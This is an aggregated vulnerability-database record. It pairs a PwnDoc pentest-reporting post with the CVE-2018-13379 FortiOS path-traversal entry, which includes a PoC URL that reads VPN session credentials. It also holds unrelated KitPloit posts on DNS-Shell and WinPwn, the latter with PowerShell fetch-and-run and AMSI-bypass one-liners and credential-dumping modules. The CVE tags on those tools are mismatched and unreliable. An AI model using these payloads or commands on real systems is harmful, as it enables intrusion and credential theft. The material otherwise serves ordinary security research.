ID KITPLOIT:1225346241981372470 Type kitploit Reporter KitPloit Modified 2020-10-21T11:30:09
Description
PwnDoc is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report.
The main goal is to have more time to Pwn and less time to Doc by mutualizing data like vulnerabilities between users.
{"id": "KITPLOIT:1225346241981372470", "bulletinFamily": "tools", "title": "Pwndoc - Pentest Report Generator", "description": "[  ](<https://1.bp.blogspot.com/-fy9pfVw01PE/X40ShOtsHVI/AAAAAAAAUGY/qoKh-bJFMjMS41mPaleRmRAcA62gkdLIwCNcBGAsYHQ/s1264/1_shared_audit_demo.gif>)\n\n \n\n\nPwnDoc is a pentest [ reporting ](<https://www.kitploit.com/search/label/Reporting> \"reporting\" ) application making it simple and easy to write your findings and generate a [ customizable ](<https://www.kitploit.com/search/label/Customizable> \"customizable\" ) Docx report. \nThe main goal is to have more time to ** Pwn ** and less time to ** Doc ** by mutualizing data like [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) between users. \n\n \n\n\n** Documentation ** \n\n\n * [ Installation ](<https://pwndoc.github.io/pwndoc/#/installation> \"Installation\" )\n * [ Data ](<https://pwndoc.github.io/pwndoc/#/data> \"Data\" )\n * [ Vulnerabilities ](<https://pwndoc.github.io/pwndoc/#/vulnerabilities> \"Vulnerabilities\" )\n * [ Audits ](<https://pwndoc.github.io/pwndoc/#/audits> \"Audits\" )\n * [ Templating ](<https://pwndoc.github.io/pwndoc/#/docxtemplate> \"Templating\" )\n \n** Features ** \n\n\n * Multiple Language support \n * Multiple Data support \n * Great Customization \n * Manage reusable Audit and [ Vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"Vulnerability\" ) Data \n * Create Custom Sections \n * Add custom fields to Vulnerabilities \n * Vulnerabilities Management \n * Multi-User reporting \n * Docx Report Generation \n * Docx Template customization \n \n** Demos ** \n \n** Multi-User reporting ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-3hDqWnsFOpI/X40SqHmEm2I/AAAAAAAAUGc/Gsjv1K2r6GU14ODGldqvIAt824liFrhsQCNcBGAsYHQ/s1264/1_shared_audit_demo.gif>)\n\n \n\n\n** Finding edition ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-XGCE9IvS6JE/X40SwiubBiI/AAAAAAAAUGg/V1v_qX3_I4AUNx7RJ-FayyTDranXZoAxwCNcBGAsYHQ/s1264/2_audit_finding_demo.gif>)\n\n \n\n\n** Vulnerability [ management ](<https://www.kitploit.com/search/label/Management> \"management\" ) workflow ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-koVgNsRMszs/X40S4s72MPI/AAAAAAAAUGo/jiPfEuNQCN0dTtmtuBW9LsoLNYTNpGshQCNcBGAsYHQ/s1268/3_create_and_update_finding.gif>)\n\n \n\n\n \n\n\n** [ Download Pwndoc ](<https://github.com/pwndoc/pwndoc> \"Download Pwndoc\" ) **\n", "published": "2020-10-21T11:30:09", "modified": "2020-10-21T11:30:09", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://www.kitploit.com/2020/10/pwndoc-pentest-report-generator.html", "reporter": "KitPloit", "references": ["https://pwndoc.github.io/pwndoc/#/docxtemplate", "https://github.com/pwndoc/pwndoc", "https://pwndoc.github.io/pwndoc/#/installation", "https://pwndoc.github.io/pwndoc/#/audits", "https://pwndoc.github.io/pwndoc/#/data", "https://pwndoc.github.io/pwndoc/#/vulnerabilities"], "cvelist": ["CVE-2018-13379"], "type": "kitploit", "lastseen": "2020-12-01T07:27:20", "edition": 2, "viewCount": 37, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-13379"]}, {"type": "attackerkb", "idList": ["AKB:35B88369-C440-49C0-98FF-C50E258FB32C"]}, {"type": "kitploit", "idList": ["KITPLOIT:8458155717277021778", "KITPLOIT:8886349906352353597", "KITPLOIT:6494588767475776833", "KITPLOIT:6426682768026225427", "KITPLOIT:5554091559782334308", "KITPLOIT:7665013338682544966", "KITPLOIT:7720783368216932128", "KITPLOIT:7460768340536359638", "KITPLOIT:5761162152532930994", "KITPLOIT:1523638640948302003"]}], "modified": "2020-12-01T07:27:20", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2020-12-01T07:27:20", "rev": 2}, "vulnersScore": 3.7}, "toolHref": "https://github.com/pwndoc/pwndoc", "scheme": null}
{"cve": [{"lastseen": "2020-11-30T00:34:32", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-04T21:29:00", "title": "CVE-2018-13379", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2020-11-19T13:15:00", "cpe": ["cpe:/o:fortinet:fortios:5.6.7", "cpe:/o:fortinet:fortios:6.0.4"], "id": "CVE-2018-13379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13379", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fortinet:fortios:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:fortinet:fortios:5.6.7:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T21:06:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379"], "description": "An Improper Limitation of a Pathname to a Restricted Directory (\u201cPath Traversal\u201d) in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.\n\n \n**Recent assessments:** \n \n**bulw4rk** at March 25, 2020 8:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**gwillcox-r7** at November 04, 2020 4:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**ccondon-r7** at November 22, 2020 6:52pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2020-07-23T00:00:00", "published": "2019-06-04T00:00:00", "id": "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "href": "https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios", "type": "attackerkb", "title": "CVE-2018-13379 Path Traversal in Fortinet FortiOS", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2020-12-01T09:24:55", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://3.bp.blogspot.com/-lJua9vPx5zY/WH4Y50a8bRI/AAAAAAAAG7E/Oq_GThKLbtcY8W5aDKNiY8NvifAdH2I2QCLcB/s1600/iptodomain.jpg>)\n\n \n\n\nThis tool allows you to extract domains from a IP range, using the historic information archived in Virustotal(using API key). It is usefull if you want to know what domains are behind of this IP address, for example in bug bounty programs one of the first steps is to extract subdomains, this tool can help with this task... first you have to find out the IP range that uses a company. Many times a good start point is to know the AS (Autonomus system) number, then you can find the IP range. \n\nTo use this tool you have to set up your Virustotal API key in the code, please sign up on Virustotal then they provide you the API key. \n\n \n** Example: ** \n\n \n \n python iptodomain.py -i 103.22.201.25 -f 103.22.201.255 -o 103.22.200.255.txt -v -r IPsCF.txt\n\n \n** Usage: ** \n\n \n \n iptodomain.py [-h] [-i FIRST_IP] [-f LAST_IP] [-w FILE2] [-o FILE1] [-v] [-r FILE3] \n\n \nThis tool allow to extract domains from IP information on Virustotal and save the output in a file. You have to set up the IP range where you like to extract domain or subdomain. Additionally it is neccesary set up your VirusTotal API key in the code. \n \n** Optional arguments: ** \n-h --help show this help message and exit. \n-i FIRST_IP The First IP of the range that you want to scan. \n-f LAST_IP The Last IP of the range that you want to scan. \n-w FILE2 Please enter the file name where report with all domains and are going to save. \n-o FILE1 Please enter the file name where the all domains found are going to save. \n-v It shows more information while you are scanning. \n-r FILE3 Please enter the name of the final report without duplicate domains results. \n \n** This tool was created by: ** \nJuan Esteban Valencia Pantoja \n \n \n\n\n** [ Download iptodomain ](<https://github.com/Hackplayers/iptodomain>) **\n", "edition": 20, "modified": "2017-01-23T14:18:09", "published": "2017-01-23T14:18:09", "id": "KITPLOIT:5779056328989230832", "href": "http://www.kitploit.com/2017/01/iptodomain-this-tool-extract-domains.html", "title": "iptodomain - This tool extract domains from IP address based in the information saved in virustotal", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:31", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://2.bp.blogspot.com/-KhZQJMox_Os/WaHMVXDpixI/AAAAAAAAItI/HZUCGUClsNwIzdE_9ybJYxBLKYz7ljYlwCLcBGAs/s1600/D0xk1t.png>)\n\n \nActive reconnaissance, [ information gathering ](<https://www.kitploit.com/search/label/Information%20Gathering>) and OSINT built in a portable web application. \n \n** 1.0 Introduction ** \n\n\n 1. ** What is this? **\nD0xk1t is an ** open-source ** , ** self-hosted ** and ** easy to use ** OSINT and active reconnaissance web application for penetration testers. Based off of the prior command-line script, D0xk1t is now fully capable of conducting reconnaissance and penetration [ testing ](<https://www.kitploit.com/search/label/Testing>) for security researchers who need a framework without the head-scratching. \n\n\n 2. ** Is this a website / web-app ? **\nYes and no. In essence, it is not a typical website. D0xk1t is self-hosted. There is no server stack, cloud-based service, SaaS, etc. that is holding it up. You can have the option of deploying D0xk1t on a local network or deploying your own instance on any infrastructure/technology as you wish (although not recommended). \n\n\n 3. ** Is this free? **\nYes. D0xk1t will forever be open-source. If you wish to contribute, you can make a fork, add any changes, and send a pull request on Github. \n \n** 2.0 Features ** \n\n\n * Easy-to-build, risk-free installation \n * Simple Bootstrap Admin Dashboard \n * Deployable to the Internet \n * Serverless (at the moment) \n * Expansive to any OS \n \n** 3.0 Installation ** \nSince D0xk1t is self-hosted, it does not work immediately out-of-box. It is recommended that you use a ` virtualenv ` container due to the sheer number of dependencies that can run into conflict with your Python configuration. \n \n** 3.1 Building ** \nLucky for you, there are two ways to build D0xk1t. The ** quick 'n easy way ** , and the ** manual way ** . \n** Quick 'n Easy Way: ** \n\n \n \n $ curl https://raw.githubusercontent.com/ex0dus-0x/D0xk1t/master/extras/install | sudo /bin/bash \n\n** Manual Way: ** \n\n \n \n $ git clone https://github.com/ex0dus-0x/D0xk1t && cd D0xk1t\n $ # Start virtualenv if you wish\n $ pip install -r requirements.txt\n $ python run.py\n\n \n** 3.2 Configuration ** \nOpen ` config.py ` . Here, you will see all the environmental variables that the application utilizes. Three important fields you ** MUST ** be aware of if you plan to deploy to the web. \n\n \n \n GOOGLEMAPS_API_KEY = \"YOUR_API_KEY_HERE\"\n \n SECRET_KEY = 'SECRET_KEY_HERE'\n\n` GOOGLEMAPS_API_KEY ` denotes the Google Maps API Key. This is essential for the GeoIP module. You can obtain it [ here ](<https://developers.google.com/maps/>) and change the variable accordingly. \n` SECRET_KEY ` is the private key utilized by WTForm's CSRF protection feature. If deployed, change it to your liking. \n \n** 3.3 Deployment ** \nOnce installed, run with ` python run.py ` . The application will run a first-time boot, and will then be accessible at ` 127.0.0.1:5000 ` . Login with credentials, and you will be present with the admin panel. \nOf course, this is self-hosting on localhost. Although work-in-progress, D0xk1t will soon support hosting on a variety of SaaS and server stacks of your choice. \n\n\n * [ Heroku ](<https://www.heroku.com/>) \\- ** TODO ** : build a ` Procfile ` , as well as bash scripts for automatic deployment \n * [ ngrok ](<https://ngrok.com/>) \\- ** TODO ** : build a script for deployment to ngrok \n \n** 4.0 Modules ** \n \n** D0x Module ** \nThe D0x module is a comprehensive info-gathering database that enables the pentester to write \"D0x\", or a file that holds a collection of data of a certain target, or targets. Using this data, the tester will be able to effectively understand their target, which is a critical point in the attacker's kill chain. D0xing is usually deemed malicious and black-hat in nature. However, with the D0x module, we aim to help security researchers gain momentum when conducting in-the-field pentesting. \nThe D0x module does come with several features, improved upon based off of the prior revision. \n\n\n * Secure database support, with delete and export (as ` .csv ` ) options \n \n** GeoIP Module ** \nWhen working with metadata, IP addresses often pop up as a point-of-interest. Using Maxmind and Google Map's APIs, the GeoIP module aims to collect [ geolocation ](<https://www.kitploit.com/search/label/Geolocation>) information on public IP addresses, in order to gather data on physical location during the reconnaissance stage of the killchain. \n\n\n * Google Maps support for accurate GeoIP visualization \n * API endpoint support for command-liners or developers. \n \n\n\n** [ Download D0xk1t ](<https://github.com/ex0dus-0x/D0xk1t>) **\n", "edition": 18, "modified": "2017-09-03T14:30:25", "published": "2017-09-03T14:30:25", "id": "KITPLOIT:7403781003449448870", "href": "http://www.kitploit.com/2017/09/d0xk1t-web-based-osint-and-active.html", "title": "D0xk1t - Web-based OSINT and Active Reconaissance Suite", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:29:15", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-T3w5NL7Wx8w/XFCJKIxxVfI/AAAAAAAAOC8/Rj-LUnTkYYgQCRj0E421O1AdmBJODl_XACLcBGAs/s1600/DNS-Shell.png>)\n\n \nDNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell>) command. \n \n** Understanding DNS-Shell ** \nThe [ Payload ](<https://www.kitploit.com/search/label/Payload>) is generated when the sever script is invoked and it simply utilizes nslookup to perform the queries and query the server for new commands the server then listens on port 53 for incoming communications, once payload is executed on the target machine the server will spawn an interactive shell. \nOnce the channel is established the payload will continously query the server for commands if a new command is entered, it will execute it and return the result back to the server. \n \n** Using DNS-Shell ** \nRunning DNS-Shell is relatively simple \nDNS-Shell supports two mode of operations direct and recursive modes: \n\n\n * Perform a git clone from our DNS-shell [ Github page ](<https://github.com/sensepost/DNS-Shell>)\n * DNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP] \n * DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain] \n \n \n\n\n** [ Download DNS-Shell ](<https://github.com/sensepost/DNS-Shell>) **\n", "edition": 16, "modified": "2019-03-14T12:35:15", "published": "2019-03-14T12:35:15", "id": "KITPLOIT:638852072268641252", "href": "http://www.kitploit.com/2019/03/dns-shell-interactive-shell-over-dns.html", "title": "DNS-Shell - An Interactive Shell Over DNS Channel", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T15:26:20", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-yVWlCrj9NRQ/XdNWsOCv0WI/AAAAAAAAQ3o/-kPeB6m8U_gTCkCH2oqxkkV3LmcAAGHtgCNcBGAsYHQ/s1600/WinPwn_2_WinPwn.jpeg>)\n\n \nIn many past internal penetration tests I often had problems with the existing Powershell Recon / [ Exploitation ](<https://www.kitploit.com/search/label/Exploitation> \"Exploitation\" ) scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy [ recognition ](<https://www.kitploit.com/search/label/Recognition> \"recognition\" ) and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring. \nAny suggestions, feedback, Pull requests and comments are welcome! \nJust Import the Modules with: ` Import-Module .\\WinPwn.ps1 ` or ` iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') ` \nFor AMSI Bypass use the following oneliner: ` iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1') ` \nIf you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included. \n \nFunctions available after Import: \n\n\n * ** ` WinPwn ` -> Menu to choose attacks: **\n\n[  ](<https://1.bp.blogspot.com/-yVWlCrj9NRQ/XdNWsOCv0WI/AAAAAAAAQ3o/-kPeB6m8U_gTCkCH2oqxkkV3LmcAAGHtgCNcBGAsYHQ/s1600/WinPwn_2_WinPwn.jpeg>)\n\n \n\n\n * ** ` Inveigh ` -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated ** \n\n * ** ` sessionGopher ` -> Executes Sessiongopher Asking you for parameters ** \n\n * ** ` kittielocal ` -> ** \n\n * Obfuscated [ Invoke-Mimikatz ](<https://www.kitploit.com/search/label/Invoke-Mimikatz> \"Invoke-Mimikatz\" ) version \n * Safetykatz in memory \n * Dump lsass using rundll32 technique \n * Download and run Lazagne \n * Dump Browser credentials \n * Extract juicy informations from memory \n * Exfiltrate Wifi-Credentials \n * Dump SAM-File NTLM Hashes \n * ** ` localreconmodules ` -> ** \n\n * Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more \n * Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP \n * Checks the Powershell event logs for [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) or other sensitive informations \n * Search for passwords in the registry and on the file system \n * Find sensitive files (config files, RDP files, keepass Databases) \n * Search for .NET Binaries on the local system \n * Optional: Get-Computerdetails (Powersploit) and PSRecon \n * ** ` domainreconmodules ` -> ** \n\n * Collect various domain informations for manual review \n * Find AD-Passwords in description fields \n * Search for potential sensitive domain share files \n * ACLAnalysis \n * Unconstrained delegation systems/users are enumerated \n * MS17-10 Scanner for domain systems \n * SQL Server discovery and Auditing functions (default credentials, passwords in the database and more) \n * MS-RPRN Check for Domaincontrollers \n * Group Policy Audit with Grouper2 \n * An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. \n * ** ` Privescmodules ` -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords) ** \n\n * ** ` latmov ` -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems ** \n\n * ** ` shareenumeration ` -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit) ** \n\n * ** ` groupsearch ` -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) ** \n\n * ** ` Kerberoasting ` -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking ** \n\n * ** ` powerSQL ` -> SQL Server discovery, Check access with current user, Audit for [ default credentials ](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) \\+ UNCPath Injection Attacks ** \n\n * ** ` Sharphound ` -> Downloads Sharphound and collects Information for the Bloodhound DB ** \n\n * ** ` adidnswildcard ` -> Create a Active Directory-Integrated DNS Wildcard Record ** \n\n * ** ` MS17-10 ` -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability ** \n\n * ** ` Sharpcradle ` -> Load C# Files from a remote Webserver to RAM ** \n\n * ** ` DomainPassSpray ` -> DomainPasswordSpray Attacks, one password for all domain users ** \n\n \n** TO-DO ** \n\n\n * Some obfuskation \n * More obfuscation \n * Proxy via PAC-File support \n * Get the scripts from my own creds repository ( [ https://github.com/S3cur3Th1sSh1t/Creds ](<https://github.com/S3cur3Th1sSh1t/Creds> \"https://github.com/S3cur3Th1sSh1t/Creds\" ) ) to be independent from changes in the original repositories \n * More Recon/Exploitation functions \n * Add MS17-10 Scanner \n * Add menu for better handling of functions \n * Amsi Bypass \n * Mailsniper integration \n * Azure Checks / Modules integration \n \n** CREDITS ** \n\n\n * [ Kevin-Robertson ](<https://github.com/Kevin-Robertson/> \"Kevin-Robertson\" ) \\- Inveigh, Powermad, Invoke-TheHash \n * [ Arvanaghi ](<https://github.com/Arvanaghi/> \"Arvanaghi\" ) \\- SessionGopher \n * [ PowerShellMafia ](<https://github.com/PowerShellMafia/> \"PowerShellMafia\" ) \\- Powersploit \n * [ Dionach ](<https://github.com/Dionach/> \"Dionach\" ) \\- PassHunt \n * [ A-mIn3 ](<https://github.com/A-mIn3/> \"A-mIn3\" ) \\- WINSpect \n * [ 411Hall ](<https://github.com/411Hall/> \"411Hall\" ) \\- JAWS \n * [ sense-of-security ](<https://github.com/sense-of-security/> \"sense-of-security\" ) \\- ADrecon \n * [ dafthack ](<https://github.com/dafthack/> \"dafthack\" ) \\- DomainPasswordSpray \n * [ rasta-mouse ](<https://github.com/rasta-mouse/> \"rasta-mouse\" ) \\- Sherlock \n * [ AlessandroZ ](<https://github.com/AlessandroZ/> \"AlessandroZ\" ) \\- LaZagne \n * [ samratashok ](<https://github.com/samratashok/> \"samratashok\" ) \\- nishang \n * [ leechristensen ](<https://github.com/leechristensen/> \"leechristensen\" ) \\- Random Repo \n * [ HarmJ0y ](<https://github.com/HarmJ0y> \"HarmJ0y\" ) \\- Many good Blogposts, Gists and Scripts \n * [ NETSPI ](<https://github.com/NetSPI/> \"NETSPI\" ) \\- PowerUpSQL \n * [ Cn33liz ](<https://github.com/Cn33liz/> \"Cn33liz\" ) \\- p0wnedShell \n * [ rasta-mouse ](<https://github.com/rasta-mouse/> \"rasta-mouse\" ) \\- AmsiScanBufferBypass \n * [ l0ss ](<https://github.com/l0ss/> \"l0ss\" ) \\- Grouper2 \n * [ dafthack ](<https://github.com/dafthack/> \"dafthack\" ) \\- DomainPasswordSpray \n * [ enjoiz ](<https://github.com/enjoiz/Privesc> \"enjoiz\" ) \\- PrivEsc \n \n \n\n\n** [ Download WinPwn ](<https://github.com/S3cur3Th1sSh1t/WinPwn> \"Download WinPwn\" ) **\n", "edition": 8, "modified": "2019-11-19T20:44:04", "published": "2019-11-19T20:44:04", "id": "KITPLOIT:1725790562296192770", "href": "http://www.kitploit.com/2019/11/winpwn-automation-for-internal-windows.html", "title": "WinPwn - Automation For Internal Windows Penetrationtest / AD-Security", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T20:27:21", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-pquDscD6FEU/XdYEUK-hS8I/AAAAAAAAQ6I/DyObxDz6Fo0LVPpR1ox60ki679Qn7yBkgCNcBGAsYHQ/s1600/glances_9_glances-summary.png>)\n\n \n** Glances ** is a cross-platform monitoring tool which aims to present a large amount of monitoring information through a curses or Web based interface. The information dynamically adapts depending on the size of the user interface. \n \nIt can also work in client/server mode. Remote monitoring could be done via terminal, Web interface or API (XML-RPC and RESTful). Stats can also be exported to files or external time/value databases. \n \n\n\n[  ](<https://1.bp.blogspot.com/-A1NZ23j5NG0/XdYEaGuZvuI/AAAAAAAAQ6M/6g2a17UbEyUQfqhYQnc0FdRQfhqX-5JMgCNcBGAsYHQ/s1600/glances_10_glances-responsive-webdesign.png>)\n\n \nGlances is written in Python and uses libraries to grab information from your system. It is based on an open architecture where developers can add new plugins or exports modules. \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(12\\)\" ) \n** Requirements ** \n\n\n * ` python 2.7,>=3.4 `\n * ` psutil>=5.3.0 ` (better with latest version) \nOptional dependencies: \n\n\n * ` bernhard ` (for the Riemann export module) \n * ` bottle ` (for Web server mode) \n * ` cassandra-driver ` (for the [ Cassandra ](<https://www.kitploit.com/search/label/Cassandra> \"Cassandra\" ) export module) \n * ` couchdb ` (for the CouchDB export module) \n * ` docker ` (for the Docker monitoring support) [Linux/macOS-only] \n * ` elasticsearch ` (for the Elastic Search export module) \n * ` hddtemp ` (for HDD temperature monitoring support) [Linux-only] \n * ` influxdb ` (for the InfluxDB export module) \n * ` kafka-python ` (for the Kafka export module) \n * ` netifaces ` (for the IP plugin) \n * ` nvidia-ml-py3 ` (for the GPU plugin) \n * ` pika ` (for the RabbitMQ/ActiveMQ export module) \n * ` potsdb ` (for the OpenTSDB export module) \n * ` prometheus_client ` (for the Prometheus export module) \n * ` py-cpuinfo ` (for the Quicklook CPU info module) \n * ` pygal ` (for the graph export module) \n * ` pymdstat ` (for RAID support) [Linux-only] \n * ` pySMART.smartx ` (for HDD Smart support) [Linux-only] \n * ` pysnmp ` (for SNMP support) \n * ` pystache ` (for the action script feature) \n * ` pyzmq ` (for the ZeroMQ export module) \n * ` requests ` (for the Ports, Cloud plugins and RESTful export module) \n * ` scandir ` (for the Folders plugin) [Only for Python < 3.5] \n * ` statsd ` (for the StatsD export module) 